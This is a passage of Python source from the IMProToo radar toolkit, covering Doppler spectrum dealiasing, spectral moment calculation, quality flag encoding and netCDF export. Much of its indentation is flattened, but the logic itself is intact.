                        warnings.warn('negative (linear) Ze occurred during dealiasing, peak removed at timestep '+str(
                            t)+', bin number ' + str(ii)+', most likely at height ' + str(peakTmpHeight))
self.qual["severeProblemsDuringDA"][t,
peakTmpHeight] = True
peakTmp = list()
peakTmpInd = list()
continue
ZeTmp = 1e18*(self.co["lamb"]**4 *
etaSumTmp/(np.pi**5*self.co["K2"]))
# guess doppler velocity
peakTmpSnowVel = self.co['dealiaseSpectrum_Ze-vRelationSnowA'] * \
ZeTmp**self.co['dealiaseSpectrum_Ze-vRelationSnowB']
peakTmpRainVel = self.co['dealiaseSpectrum_Ze-vRelationRainA'] * \
ZeTmp**self.co['dealiaseSpectrum_Ze-vRelationRainB']
peakTmpRefVel = (peakTmpSnowVel + peakTmpRainVel)/2.
# save other features
peaksVref.append(peakTmpRefVel)
peaks.append(peakTmp)
peaksIndices.append(peakTmpInd)
peaksStartIndices.append(peakTmpInd[0])
peaksEndIndices.append(peakTmpInd[-1])
peaksMaxIndices.append(np.argmax(peakTmp)+ii-len(peakTmp))
peaksHeight.append(peakTmpHeight)
peaksVelMe.append(
np.sum((velMe[orgIndex[0]:orgIndex[-1]+1]*peakTmp))/np.sum(peakTmp))
peaksZe.append(ZeTmp)
peakTmp = list()
peakTmpInd = list()
truncatingPeak = False
# small peaks can show up again due to dealiasing, get rid of them:
elif len(peakTmp) > 0 and len(peakTmp) < self.co["findPeak_minPeakWidth"]:
peakTmp = list()
peakTmpInd = list()
truncatingPeak = False
# no peak
else:
continue
# we want only ONE peak per range gate!
if self.co["dealiaseSpectrum_maxOnePeakPerHeight"]:
                # get a list of the peaks which are superfluous
peaksTbd = self._maxOnePeakPerHeight(
t, peaksStartIndices, peaksEndIndices, peaksZe)
# remove them
for peakTbd in np.sort(peaksTbd)[::-1]:
peaks.pop(peakTbd)
peaksIndices.pop(peakTbd)
peaksMaxIndices.pop(peakTbd)
peaksVelMe.pop(peakTbd)
peaksHeight.pop(peakTbd)
peaksVref.pop(peakTbd)
peaksZe.pop(peakTbd)
# if anything was found, save it
if len(peaks) > 0:
allPeaks[t] = peaks
allPeaksIndices[t] = peaksIndices
allPeaksMaxIndices[t] = peaksMaxIndices
allPeaksVelMe[t] = peaksVelMe
allPeaksHeight[t] = peaksHeight
allPeaksRefV[t] = peaksVref
allPeaksZe[t] = peaksZe
# end for t
return allPeaks, allPeaksIndices, allPeaksMaxIndices, allPeaksVelMe, allPeaksHeight, allPeaksRefV, allPeaksZe
def _maxOnePeakPerHeight(self, t, peaksStartIndices, peaksEndIndices, peaksZe):
        '''
        some heights will contain more than one peak, try to find them
        returns a list with peaks to be deleted
        '''
peaksStartIndices = np.array(peaksStartIndices)
peaksEndIndices = np.array(peaksEndIndices)
peaksZeCopy = np.array(peaksZe)
peaksTbd = list()
for pp, peakStart in enumerate(peaksStartIndices):
deletePeaks = False
if peakStart == -9999:
continue # peak has been deleted
followingPeaks = (peaksStartIndices >= peakStart) * \
(peaksStartIndices < peakStart+(1.5*self.co["widthSpectrum"]))
if (np.sum(followingPeaks) >= 3):
                # if you have three peaks so close together it is crystal clear:
deletePeaks = True
elif (np.sum(followingPeaks) == 2):
# if you have only two they must be close together
secondPeak = np.where(followingPeaks)[0][1]
deletePeaks = (
peaksEndIndices[secondPeak] - peakStart < self.co["widthSpectrum"]/2.)
if deletePeaks == True:
# don't consider more than 3! the rest is hopefully caught by next loop!
Indices = np.where(followingPeaks)[0][0:3]
smallestZe = Indices[np.argmin(peaksZeCopy[Indices])]
peaksTbd.append(smallestZe)
# these are needed for the loop, so they are only masked, not deleted
peaksStartIndices[peaksTbd[-1]] = -9999
peaksEndIndices[peaksTbd[-1]] = -9999
peaksZeCopy[peaksTbd[-1]] = 9999
return peaksTbd
def _getTrustedPeak(self, allPeaksZe, allPeaksVelMe, allPeaksRefV, allPeaksMaxIndices, allPeaksHeight):
        '''
        find height and position of the most trustworthy peak
        allPeaksZe - time dictionary with lists of first guess Ze for each peak
        allPeaksVelMe - first guess peak velocity based on the last bin
        allPeaksRefV - expected velocity of each peak based on Ze according to theory
        allPeaksMaxIndices - time dictionary with the maximum of each peak
        allPeaksHeight - first guess peak height based on the last bin
        returns 1D time arrays
        trustedPeakNo - number of the trusted peak (starting at bottom)
        trustedPeakHeight - estimated height
        trustedPeakVel - estimated velocity
        trustedPeakHeightStart, trustedPeakHeightStop - start and stop indices from the 0:192 range
        '''
trustedPeakHeight = np.zeros(self.no_t, dtype=int)
trustedPeakVel = np.zeros(self.no_t)
trustedPeakNo = np.ones(self.no_t, dtype=int)*-9999
trustedPeakHeightStart = np.zeros(self.no_t, dtype=int)
trustedPeakHeightStop = np.zeros(self.no_t, dtype=int)
for t in np.arange(self.no_t):
# now process the found peaks
if t in list(self._allPeaks.keys()):
# the trusted peak needs a certain minimal reflectivity to avoid confusion by interference etc, get the minimum threshold
averageZe = np.sum(allPeaksZe[t])/float(len(allPeaksZe[t]))
minZe = quantile(
self._allPeaksZe[t], self.co['dealiaseSpectrum_trustedPeakminZeQuantile'])
peaksVelMe = np.array(allPeaksVelMe[t])
peaksVels = np.array([peaksVelMe+self.co["nyqVdelta"]*self.co["widthSpectrum"],
peaksVelMe, peaksVelMe-self.co["nyqVdelta"]*self.co["widthSpectrum"]])
refVels = np.array(
[allPeaksRefV[t], allPeaksRefV[t], allPeaksRefV[t]])
                # the difference between the observed velocity (three options are tried: dealiasing up, static, or down) and the expected Ze-based velocity has to be minimal to find the trusted peak
diffs = np.abs(peaksVels - refVels)
                # mask small peaks, peaks which are in the first processed range gate and peaks which are in self.co["dealiaseSpectrum_heightsWithInterference"] (e.g. disturbed by interference)
diffs = np.ma.masked_array(diffs, [allPeaksZe[t] <= minZe]*3)
tripplePeaksMaxIndices = np.array(3*[allPeaksMaxIndices[t]])
                # the first used height is a bit special, often peaks are incomplete; try to catch them to avoid trusting them
diffs = np.ma.masked_array(diffs, (tripplePeaksMaxIndices >= self.co["firstUsedHeight"]*self.co["widthSpectrum"])*(
tripplePeaksMaxIndices < self.co["firstUsedHeight"]*(self.co["widthSpectrum"]*1.5)))
# now mask all other peaks which are found unlikely
for hh in self.co["dealiaseSpectrum_heightsWithInterference"]+self.co["completelyMaskedHeights"]:
diffs = np.ma.masked_array(diffs, (tripplePeaksMaxIndices >= hh*self.co["widthSpectrum"])*(
tripplePeaksMaxIndices < (hh+1)*self.co["widthSpectrum"]))
                # if we managed to mask all peaks, we have no choice but to take all of them
                if np.all(diffs.mask == True):
                    diffs.mask[:] = False
                    if self.co["debug"] > 4:
                        print("managed to mask all peaks at " + str(t) +
                              " while trying to find the most trustworthy one during dealiasing.")
                # the minimum velocity difference tells whether dealiasing goes up, down or is not applied
UpOrDn = np.ma.argmin(np.ma.min(diffs, axis=1))
                # get parameters for trusted peaks
trustedPeakNo[t] = np.ma.argmin(diffs[UpOrDn])
# -1 to ensure that updraft is negative now!!
trustedPeakHeight[t] = allPeaksHeight[t][trustedPeakNo[t]] + UpOrDn-1
trustedPeakSpecShift = trustedPeakHeight[t] * \
self.co["widthSpectrum"] - self.co["widthSpectrum"]
trustedPeakVel[t] = peaksVels[UpOrDn][trustedPeakNo[t]]
# transform back to height related spectrum
# in dimension of 0:192 #spectrum is extended to the left
trustedPeakHeightIndices = (np.array(
self._allPeaksIndices[t][trustedPeakNo[t]])-trustedPeakSpecShift)[[0, -1]]
trustedPeakHeightStart[t] = trustedPeakHeightIndices[0]
trustedPeakHeightStop[t] = trustedPeakHeightIndices[-1]
return trustedPeakNo, trustedPeakHeight, trustedPeakVel, trustedPeakHeightStart, trustedPeakHeightStop
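    # Commented sketch of the Ze-v relations used above to predict the reference fall
    # velocity from a first-guess Ze. The coefficients below are hypothetical; the real
    # ones come from self.co['dealiaseSpectrum_Ze-vRelation...'].
    #
    #   ZeTmp = 2.0                      # hypothetical linear Ze
    #   vSnow = 0.8 * ZeTmp**0.1         # hypothetical snow relation a*Ze^b
    #   vRain = 2.6 * ZeTmp**0.1         # hypothetical rain relation a*Ze^b
    #   refVel = (vSnow + vRain) / 2.    # expected velocity of the peak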
def _findHeightsForPeaks(self, extendedRawSpectrum, trustedPeakNo, trustedPeakVel, trustedPeakHeight, trustedPeakHeightStart, trustedPeakHeightStop, allPeaks, allPeaksIndices, allPeaksVelMe, allPeaksHeight):
        '''
        try to find the height of each peak by starting at the trusted peak
        extendedRawSpectrum - extended to 192 bins, returned with new, dealiased mask
        trustedPeakNo - trusted peak number of all peaks in time step
        trustedPeakVel - most likely velocity
        trustedPeakHeight - most likely height
        trustedPeakHeightStart, trustedPeakHeightStop - start/stop of peaks
        allPeaks - time dictionary with lists of the spectral reflectivities for each peak
        allPeaksIndices - related indices
        allPeaksVelMe - first guess peak velocity based on the last bin
        allPeaksHeight - first guess peak height based on the last bin
        '''
for t in np.arange(self.no_t):
if t in list(self._allPeaks.keys()):
extendedRawSpectrum[t, trustedPeakHeight[t],
trustedPeakHeightStart[t]:trustedPeakHeightStop[t]+1].mask = False
peaksVelMe = np.array(allPeaksVelMe[t])
# get all three possible velocities
peaksVels = np.array([peaksVelMe+self.co["nyqVdelta"]*self.co["widthSpectrum"],
peaksVelMe, peaksVelMe-self.co["nyqVdelta"]*self.co["widthSpectrum"]])
formerPeakVel = trustedPeakVel[t]
# loop through all peaks, starting at the trusted one
for jj in list(range(trustedPeakNo[t]-1, -1, -1))+list(range(trustedPeakNo[t]+1, len(allPeaks[t]))):
# To combine ascending and descending loop in one:
if jj == trustedPeakNo[t]+1:
formerPeakVel = trustedPeakVel[t]
                    # go up, stay or down? choose the option for which the difference to the former (trusted) peak is smallest.
UpOrDn = np.argmin(
np.abs(peaksVels[:, jj] - formerPeakVel))
# change height, indices and velocity accordingly
thisPeakHeight = allPeaksHeight[t][jj] + UpOrDn-1
if thisPeakHeight not in list(range(self.co["noH"])):
                        warnings.warn('Dealiasing failed! peak boundaries exceed max/min height. time step '+str(
                            t)+', peak number ' + str(jj)+', tried to put at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
thisPeakSpecShift = thisPeakHeight * \
self.co["widthSpectrum"] - self.co["widthSpectrum"]
thisPeakVel = peaksVels[UpOrDn][jj]
thisPeakHeightIndices = np.array(
allPeaksIndices[t][jj])-thisPeakSpecShift
if np.any(thisPeakHeightIndices < 0) or np.any(thisPeakHeightIndices >= 3*self.co["widthSpectrum"]):
warnings.warn('Dealiasing failed! peak boundaries fall out of spectrum. time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
# check whether there is already a peak in the found height!
if np.all(extendedRawSpectrum[t, thisPeakHeight].mask == True):
if thisPeakHeight >= self.co["noH"] or thisPeakHeight < 0:
warnings.warn('Dealiasing reached max/min height... time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
# only if there is no peak yet!!
extendedRawSpectrum[t, thisPeakHeight, thisPeakHeightIndices[0] :thisPeakHeightIndices[-1]+1].mask = False
formerPeakVel = thisPeakVel
# if there is already a peak in the height, repeat the process, but take the second likely height/velocity
else:
if self.co["debug"] > 4:
print('DA: there is already a peak in found height, take second choice',
t, jj, thisPeakHeight, trustedPeakNo[t], trustedPeakHeight)
# otherwise take second choice!
formerPeakVelList = np.array([formerPeakVel]*3)
formerPeakVelList[UpOrDn] = 1e10 # make extremely big
UpOrDn2 = np.ma.argmin(
np.abs(peaksVels[:, jj] - formerPeakVelList))
thisPeakHeight = allPeaksHeight[t][jj] + UpOrDn2-1
if thisPeakHeight not in list(range(self.co["noH"])):
                            warnings.warn('Dealiasing step 2 failed! peak boundaries exceed max/min height. time step '+str(
                                t)+', peak number ' + str(jj)+', tried to put at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
thisPeakSpecShift = thisPeakHeight * \
self.co["widthSpectrum"] - self.co["widthSpectrum"]
thisPeakVel = peaksVels[UpOrDn2][jj]
thisPeakHeightIndices = np.array(
allPeaksIndices[t][jj])-thisPeakSpecShift
if np.any(thisPeakHeightIndices < 0) or np.any(thisPeakHeightIndices >= 3*self.co["widthSpectrum"]):
warnings.warn('Dealiasing step 2 failed! peak boundaries fall out of spectrum. time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
if thisPeakHeight >= self.co["noH"] or thisPeakHeight < 0:
warnings.warn('Dealiasing reached max/min height... time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
# check again whether there is already a peak in the spectrum
if np.all(extendedRawSpectrum[t, thisPeakHeight].mask == True):
# next try
extendedRawSpectrum[t, thisPeakHeight, thisPeakHeightIndices[0] :thisPeakHeightIndices[-1]+1].mask = False
formerPeakVel = thisPeakVel
# if yes, give up
else:
warnings.warn('Could not find height of peak! time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
return extendedRawSpectrum
def _deAlCoherence(self, newSpectrum):
        '''
        make sure no weird foldings happened by looking for big jumps in the height-averaged velocity
        if two jumps very close together (<=3 peaks in between) are found, the peaks in between are corrected
        can make it worse if dealiasing produces zig-zag patterns.
        '''
self.qual["DAdirectionCorrectedByCoherenceTest"] = np.zeros(
self._shape2D, dtype=bool)
meanVelocity = np.ma.average(np.ma.sum(
newSpectrum*self.specVel, axis=-1)/np.ma.sum(newSpectrum, axis=-1), axis=-1)
velDiffs = np.diff(meanVelocity)
# find velocity jumps
velDiffsBig = np.where(
velDiffs > self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
velDiffsSmall = np.where(
velDiffs < -self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
# check whether there is an opposite one close by and collect time steps to be refolded
foldUp = list()
for ll in velDiffsBig:
if ll+1 in velDiffsSmall:
foldUp.append(ll+1)
continue
if ll+2 in velDiffsSmall:
foldUp.append(ll+1)
foldUp.append(ll+2)
continue
if ll+3 in velDiffsSmall:
foldUp.append(ll+1)
foldUp.append(ll+2)
foldUp.append(ll+3)
updatedSpectrumMask = deepcopy(newSpectrum.mask)
for tt in foldUp:
updatedSpectrumMask[tt] = np.roll(updatedSpectrumMask[tt].ravel(
), 2 * self.co["widthSpectrum"]).reshape((self.co["noH"], 3*self.co["widthSpectrum"]))
            # avoid that something is folded into the lowest range gate
updatedSpectrumMask[tt, 0, :2*self.co["widthSpectrum"]] = True
self.qual["DAdirectionCorrectedByCoherenceTest"][tt, :] = True
if self.co["debug"] > 4:
print('coherenceTest corrected dealiasing upwards:', foldUp)
newSpectrum = np.ma.masked_array(newSpectrum.data, updatedSpectrumMask)
# now the same for the other folding direction
meanVelocity = np.ma.average(np.ma.sum(
newSpectrum*self.specVel, axis=-1)/np.ma.sum(newSpectrum, axis=-1), axis=-1)
velDiffs = np.diff(meanVelocity)
# find very big differences
velDiffsBig = np.where(
velDiffs > self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
velDiffsSmall = np.where(
velDiffs < -self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
foldDn = list()
# check whether there is an opposite one close by and collect time steps to be refolded
for ll in velDiffsSmall:
if ll+1 in velDiffsBig:
foldDn.append(ll+1)
continue
if ll+2 in velDiffsBig:
foldDn.append(ll+1)
foldDn.append(ll+2)
continue
            if ll+3 in velDiffsBig:
                foldDn.append(ll+1)
                foldDn.append(ll+2)
                foldDn.append(ll+3)
updatedSpectrumMask = deepcopy(newSpectrum.mask)
# change all peaks accordingly
for tt in foldDn:
# roll the mask!
updatedSpectrumMask[tt] = np.roll(updatedSpectrumMask[tt].ravel(
), -2*self.co["widthSpectrum"]).reshape((self.co["noH"], 3*self.co["widthSpectrum"]))
            # avoid that something is folded into the highest range gate
updatedSpectrumMask[tt, -1, -2*self.co["widthSpectrum"]:] = True
self.qual["DAdirectionCorrectedByCoherenceTest"][tt, :] = True
if self.co["debug"] > 4:
                print('coherenceTest corrected dealiasing downwards:', foldDn)
newSpectrum = np.ma.masked_array(newSpectrum.data, updatedSpectrumMask)
        # this method is very incomplete, so save still odd looking peaks in the quality mask:
        # first, collect all heights which should be treated; we don't want to find jumps in the interpolated area!:
includedHeights = list(set(range(self.co["maxH"])).difference(set(
self.co["completelyMaskedHeights"]+self.co["dealiaseSpectrum_heightsWithInterference"])))
# now get the mean velocity of the profile
meanVelocity = np.ma.average(np.ma.sum(
newSpectrum[:, includedHeights]*self.specVel, axis=-1)/np.ma.sum(newSpectrum[:, includedHeights], axis=-1), axis=-1)
velDiffs = np.abs(np.diff(meanVelocity))
# find all steps exceeding a min velocity threshold
crazyVelDiffs = np.where(
velDiffs > self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
self.qual["DAbigVelocityJumpDespiteCoherenceTest"] = np.zeros(
self._shape2D, dtype=bool)
        # surrounding data has to be masked as well, take +- self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"] (default 20 min) around suspicious data
for crazyVelDiff in crazyVelDiffs:
self.qual["DAbigVelocityJumpDespiteCoherenceTest"][crazyVelDiff-self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"] :crazyVelDiff+self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"]+1, :] = True
return newSpectrum
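    # Commented sketch of the jump detection used above: differentiate the profile-mean
    # velocity in time and flag steps exceeding a threshold (numbers are hypothetical).
    #
    #   import numpy as np
    #   meanVelocity = np.array([1.0, 1.1, 7.5, 7.4, 1.2])  # toy time series
    #   threshold = 3.0                                      # hypothetical jump threshold
    #   velDiffs = np.diff(meanVelocity)
    #   up = np.where(velDiffs > threshold)[0]               # jump up after index 1
    #   dn = np.where(velDiffs < -threshold)[0]              # jump down after index 3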
def _calcEtaZeW(self, rawSpectra, heights, velocities, noise, noise_std):
        '''
        calculate the spectral moments and other spectral variables
        '''
deltaH = oneD2twoD(
heights[..., 15]-heights[..., 14], heights.shape[-1], 1)
        # transpose to make the multiplication possible!
eta = (rawSpectra.data.T * np.array(
(self.co["mrrCalibConst"] * (heights**2 / deltaH)) / (1e20), dtype=float).T).T
eta = np.ma.masked_array(eta, rawSpectra.mask)
etaNoiseAve = noise * \
(self.co["mrrCalibConst"] * (heights**2 / deltaH)) / 1e20
etaNoiseStd = noise_std * \
(self.co["mrrCalibConst"] * (heights**2 / deltaH)) / 1e20
# calculate Ze
Ze = 1e18*(self.co["lamb"]**4*np.ma.sum(eta,
axis=-1)/(np.pi**5*self.co["K2"]))
Ze = (10*np.ma.log10(Ze)).filled(-9999)
#Znoise = 1e18*(self.co["lamb"]**4*(etaNoise*self.co["widthSpectrum"])/(np.pi**5*self.co["K2"]))
#Znoise = 10*np.ma.log10(Znoise).filled(-9999)
        # no slicing necessary due to mask! defining average value "my"
my = np.ma.sum(velocities*rawSpectra, axis=-1) / \
np.ma.sum(rawSpectra, axis=-1)
# normed weights
P = (rawSpectra.T/np.ma.sum(rawSpectra, axis=-1).T).T
x = velocities
# http://mathworld.wolfram.com/CentralMoment.html
        # T is necessary due to different dimensions
mom2 = np.ma.sum(P*(x.T-my.T).T**2, axis=-1)
mom3 = np.ma.sum(P*(x.T-my.T).T**3, axis=-1)
mom4 = np.ma.sum(P*(x.T-my.T).T**4, axis=-1)
# average fall velocity is my
W = my.filled(-9999)
# spec width is weighted std
specWidth = np.sqrt(mom2).filled(-9999)
        # http://mathworld.wolfram.com/Skewness.html
skewness = (mom3/mom2**(3./2.)).filled(-9999)
# http://mathworld.wolfram.com/Kurtosis.html
kurtosis = (mom4/mom2**(2.)).filled(-9999)
# get velocity at borders and max of peak
peakVelLeftBorder = self.specVel[np.argmin(rawSpectra.mask, axis=-1)]
peakVelRightBorder = self.specVel[len(
self.specVel) - np.argmin(rawSpectra.mask[..., ::-1], axis=-1) - 1]
peakVelMax = self.specVel[np.argmax(rawSpectra.filled(-9999), axis=-1)]
        # get the corresponding indices
peakArgLeftBorder = np.argmin(rawSpectra.mask, axis=-1)
peakArgRightBorder = len(
self.specVel) - np.argmin(rawSpectra.mask[..., ::-1], axis=-1) - 1
# to find the entries we have to flatten everything
etaSpectraFlat = eta.reshape((eta.shape[0]*eta.shape[1], eta.shape[2]))
        # now get the corresponding values
peakEtaLeftBorder = 10*np.log10(etaSpectraFlat[list(range(
etaSpectraFlat.shape[0])), peakArgLeftBorder.ravel()].reshape(self._shape2D))
peakEtaRightBorder = 10*np.log10(etaSpectraFlat[list(range(
etaSpectraFlat.shape[0])), peakArgRightBorder.ravel()].reshape(self._shape2D))
peakEtaMax = 10*np.log10(np.max(eta.filled(-9999), axis=-1))
leftSlope = (peakEtaMax - peakEtaLeftBorder) / \
(peakVelMax - peakVelLeftBorder)
rightSlope = (peakEtaMax - peakEtaRightBorder) / \
(peakVelMax - peakVelRightBorder)
peakVelLeftBorder[Ze == -9999] = -9999
peakVelRightBorder[Ze == -9999] = -9999
leftSlope[Ze == -9999] = -9999
rightSlope[Ze == -9999] = -9999
leftSlope[np.isnan(leftSlope)] = -9999
rightSlope[np.isnan(rightSlope)] = -9999
return eta, Ze, W, etaNoiseAve, etaNoiseStd, specWidth, skewness, kurtosis, peakVelLeftBorder, peakVelRightBorder, leftSlope, rightSlope
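    # Commented sketch of the central-moment estimates computed above, for a toy
    # spectrum with normed weights P over velocity bins x:
    #
    #   import numpy as np
    #   x = np.linspace(0., 12., 64)                 # toy velocity bins
    #   s = np.exp(-0.5 * ((x - 5.) / 1.5)**2)       # toy Gaussian peak
    #   P = s / s.sum()
    #   my = (P * x).sum()                           # mean Doppler velocity W
    #   mom2 = (P * (x - my)**2).sum()
    #   width = np.sqrt(mom2)                        # spectral width
    #   skew = (P * (x - my)**3).sum() / mom2**1.5   # skewness
    #   kurt = (P * (x - my)**4).sum() / mom2**2     # kurtosis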
def getQualityBinArray(self, qual):
'''
convert the bool quality masks to one binary array
'''
binQual = np.zeros(self._shape2D, dtype=int)
qualFac = dict()
description = ''
        description += 'A) usually, the following errors can be ignored (no. is position of bit): '
qualFac["interpolatedSpectrum"] = 0b1
description += '1) spectrum interpolated around 0 and 12 m s^-1 '
qualFac["filledInterpolatedPeakGaps"] = 0b10
        description += '2) peak stretches over interpolated part '
qualFac["spectrumIsDealiased"] = 0b100
description += '3) peak is dealiased '
qualFac["usedSecondPeakAlgorithmDueToWidePeak"] = 0b1000
description += '4) first Algorithm to determine peak failed, used backup '
qualFac["DAdirectionCorrectedByCoherenceTest"] = 0b10000
description += '5) dealiasing went wrong, but is corrected '
description += 'B) reasons why a spectrum does NOT contain a peak: '
qualFac["incompleteSpectrum"] = 0b10000000
description += '8) spectrum was incompletely recorded '
qualFac["spectrumVarianceTooLowForPeak"] = 0b100000000
description += '9) the variance test indicated no peak '
qualFac["spectrumNotProcessed"] = 0b1000000000
description += '10) spectrum is not processed due to according setting '
qualFac["peakTooThinn"] = 0b10000000000
description += '11) peak removed since not wide enough '
qualFac["peakRemovedByCoherenceTest"] = 0b100000000000
        description += '12) peak removed, because too few neighbours show a signal '
description += "C) thinks went seriously wrong, don't use data with these codes"
qualFac["peakMightBeIncomplete"] = 0b1000000000000000
description += '16) peak is at the very border to bad data '
qualFac["DAbigVelocityJumpDespiteCoherenceTest"] = 0b10000000000000000
description += '17) in this area there are still strong velocity jumps, indicates failed dealiasing '
qualFac["severeProblemsDuringDA"] = 0b100000000000000000
        description += '18) during dealiasing, a warning was triggered, applied to whole column '
for key in list(qual.keys()):
binQual[:] = binQual[:] + (qual[key] * qualFac[key])
return binQual, description
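    # Commented usage sketch for the binary quality array returned above: individual
    # flags can be tested with a bitwise AND (bit positions as in the description).
    #
    #   binQual, description = self.getQualityBinArray(self.qual)
    #   isDealiased = (binQual & 0b100) != 0                  # bit 3: peak is dealiased
    #   severeDA = (binQual & 0b100000000000000000) != 0      # bit 18: severe problem during DA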
def writeNetCDF(self, fname, varsToSave="all", ncForm="NETCDF3_CLASSIC"):
        '''
        write the results to a netCDF file
        Input:
        fname: str filename with path
        varsToSave: list of variables of the profile to be saved. "all" saves all implemented ones
        ncForm: str netCDF file format, possible values are NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4 for the python-netcdf4 package. NETCDF3 takes the "old" Scientific.IO.NetCDF module, which is a bit more convenient to install, or as fall back option python-netcdf3.
        '''
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
        # option dealiaseSpectrum_saveAlsoNonDealiased only makes sense if the spectrum is really dealiased:
saveAlsoNonDealiased = self.co["dealiaseSpectrum_saveAlsoNonDealiased"] and self.co["dealiaseSpectrum"]
if pyNc:
cdfFile = nc.Dataset(fname, "w", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fname, "w")
# write meta data
cdfFile.title = 'Micro rain radar data processed with IMProToo'
cdfFile.comment = 'IMProToo has been developed for improved snow measurements. Note that this data has been processed regardless of precipitation type.'
cdfFile.institution = self.co["ncInstitution"]
cdfFile.contact_person = self.co["ncCreator"]
cdfFile.source = 'MRR-2'
cdfFile.location = self.co["ncLocation"]
cdfFile.history = 'Created with IMProToo v' + __version__
cdfFile.author = 'Max Maahn'
cdfFile.processing_date = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S UTC")
cdfFile.reference = 'Maahn, M. and Kollias, P., 2012: Improved Micro Rain Radar snow measurements using Doppler spectra post-processing, Atmos. Meas. Tech., 5, 2661-2673, doi:10.5194/amt-5-2661-2012. '
cdfFile.properties = str(self.co)
cdfFile.mrrHeader = str(self.header)
        # make dimensions
cdfFile.createDimension('time', int(self.no_t))
cdfFile.createDimension('range', int(self.no_h))
cdfFile.createDimension('velocity', int(self.no_v))
if saveAlsoNonDealiased:
cdfFile.createDimension('velocity_noDA', int(self.no_v_noDA))
ncShape2D = ("time", "range",)
ncShape3D = ("time", "range", "velocity",)
ncShape3D_noDA = ("time", "range", "velocity_noDA",)
fillVDict = dict()
# little cheat to avoid hundreds of if, else...
if pyNc:
fillVDict["fill_value"] = self.missingNumber
nc_time = cdfFile.createVariable('time', 'i', ('time',), **fillVDict)
nc_time.description = "measurement time. Following Meteks convention, the dataset at e.g. 11:55 contains all recorded raw between 11:54:00 and 11:54:59 (if delta t = 60s)!"
nc_time.timezone = self.timezone
nc_time.units = 'seconds since 1970-01-01 00:00:00'
nc_time[:] = np.array(self.time.filled(self.missingNumber), dtype="i4")
# commented because of Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/python-scientific/+bug/1005571
#if not pyNc: nc_time._FillValue =int(self.missingNumber)
nc_range = cdfFile.createVariable(
'range', 'i', ('range',), **fillVDict) # = missingNumber)
nc_range.description = "range bins"
nc_range.units = '#'
nc_range[:] = np.arange(self.co["minH"], self.co["maxH"]+1, dtype="i4")
#if not pyNc: nc_range._FillValue =int(self.missingNumber)
nc_velocity = cdfFile.createVariable(
'velocity', 'f', ('velocity',), **fillVDict)
nc_velocity.description = "Doppler velocity bins. If dealiasing is applied, the spectra are triplicated"
nc_velocity.units = 'm s^-1'
nc_velocity[:] = np.array(self.specVel, dtype="f4")
#if not pyNc: nc_velocity._FillValue =float(self.missingNumber)
if saveAlsoNonDealiased:
nc_velocity_noDA = cdfFile.createVariable(
'velocity_noDA', 'f', ('velocity_noDA',), **fillVDict)
nc_velocity_noDA.description = "Original, non dealiased, Doppler velocity bins."
nc_velocity_noDA.units = 'm s^-1'
nc_velocity_noDA[:] = np.array(self.specVel_noDA, dtype="f4")
#if not pyNc: nc_velocity_noDA._FillValue =float(self.missingNumber)
nc_height = cdfFile.createVariable(
'height', 'f', ncShape2D, **fillVDict) # = missingNumber)
nc_height.description = "height above instrument"
nc_height.units = 'm'
nc_height[:] = np.array(self.H.filled(self.missingNumber), dtype="f4")
#if not pyNc: nc_height._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "eta_noDA" in varsToSave:
nc_eta_noDA = cdfFile.createVariable(
'eta_noDA', 'f', ncShape3D_noDA, **fillVDict)
nc_eta_noDA.description = "spectral reflectivities NOT dealiased"
nc_eta_noDA.units = "mm^6 m^-3"
nc_eta_noDA[:] = np.array(self.eta_noDA.data, dtype="f4")
#if not pyNc: nc_eta_noDA._FillValue =float(self.missingNumber)
nc_etaMask_noDA = cdfFile.createVariable(
'etaMask_noDA', 'i', ncShape3D_noDA, **fillVDict)
nc_etaMask_noDA.description = "noise mask of eta NOT dealiased, 0: signal, 1:noise"
nc_etaMask_noDA.units = "bool"
nc_etaMask_noDA[:] = np.array(
np.array(self.eta_noDA.mask, dtype=int), dtype="i4")
#if not pyNc: nc_etaMask_noDA._FillValue =int(self.missingNumber)
if varsToSave == 'all' or "eta" in varsToSave:
nc_eta = cdfFile.createVariable('eta', 'f', ncShape3D, **fillVDict)
nc_eta.description = "spectral reflectivities. if dealiasing is applied, the spectra are triplicated, thus up to three peaks can occur from -12 to +24 m s^-1. However, only one peak is not masked in etaMask"
nc_eta.units = "mm^6 m^-3"
nc_eta[:] = np.array(self.eta.data, dtype="f4")
#if not pyNc: nc_eta._FillValue =float(self.missingNumber)
nc_etaMask = cdfFile.createVariable(
'etaMask', 'i', ncShape3D, **fillVDict)
nc_etaMask.description = "noise mask of eta, 0: signal, 1:noise"
nc_etaMask.units = "bool"
nc_etaMask[:] = np.array(
np.array(self.eta.mask, dtype=int), dtype="i4")
#if not pyNc: nc_etaMask._FillValue =int(self.missingNumber)
if varsToSave == 'all' or "quality" in varsToSave:
qualArray, qualDescription = self.getQualityBinArray(self.qual)
nc_qual = cdfFile.createVariable(
'quality', 'i', ncShape2D, **fillVDict)
nc_qual.description = qualDescription
